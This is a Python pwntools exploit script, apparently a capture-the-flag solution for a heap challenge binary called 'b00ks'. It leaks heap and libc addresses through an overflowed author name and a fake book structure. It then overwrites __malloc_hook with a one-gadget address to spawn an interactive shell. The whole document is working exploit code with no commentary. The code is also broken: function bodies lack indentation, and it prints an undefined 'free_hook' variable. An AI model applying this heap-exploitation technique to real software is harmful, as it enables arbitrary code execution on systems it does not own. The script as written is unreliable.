from pwn import *
s = process("./b00ks")
elf = ELF("./b00ks")
libc = ELF("./libc")
def first(name):
s.recvuntil("Enter author name: ")
s.sendline(name)
def create(size,name,dis_size,content):
s.recvuntil("> ")
s.sendline("1")
s.recvuntil("Enter book name size: ")
s.sendline(str(size))
s.recvuntil("Enter book name (Max 32 chars): ")
s.sendline(name)
s.recvuntil("Enter book description size: ")
s.sendline(str(dis_size))
s.recvuntil("Enter book description: ")
s.sendline(content)
def delete(number):
s.recvuntil("> ")
s.sendline("2")
s.recvuntil("Enter the book id you want to delete: ")
s.sendline(str(number))
def edit(ids,disc):
s.recvuntil("> ")
s.sendline("3")
s.recvuntil("Enter the book id you want to edit: ")
s.sendline(str(ids))
s.recvuntil("Enter new book description: ")
s.sendline(disc)
def show():
s.recvuntil("> ")
s.sendline("4")
def change(name):
s.recvuntil("> ")
s.sendline("5")
s.recvuntil("Enter author name: ")
s.sendline(name)
def quit():
s.recvuntil("> ")
s.sendline("6")
first("K"*32)
create(128,"1"*128,128,"A"*128)
show()
s.recvuntil("K"*32)
heap = u64(s.recv(6)+"\x00\x00")
print "heap : " + hex(heap)
delete(1)
pay = "B"*(8*10)
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(heap - 0x60)
create(128,"2"*128,128,pay)
create(128,"3"*128,128,"C"*128)
create(128,"4"*128,128,"D"*128)
delete(3)
change("K"*32)
show()
s.recvuntil("Name: ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - 0x3c4b78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_shot = libc_base + 0xf02a4
print "libc_base : " + hex(libc_base)
print "free_hook : " + hex(free_hook)
print "malloc_hook : " + hex(malloc_hook)
print "one_shot : " + hex(one_shot)
pay = "B"*32
pay += p64(31337)
pay += p64(heap+0x30)
pay += p64(malloc_hook)
edit(31337,pay)
edit(31337,p64(one_shot))
delete(31337)
s.interactive()
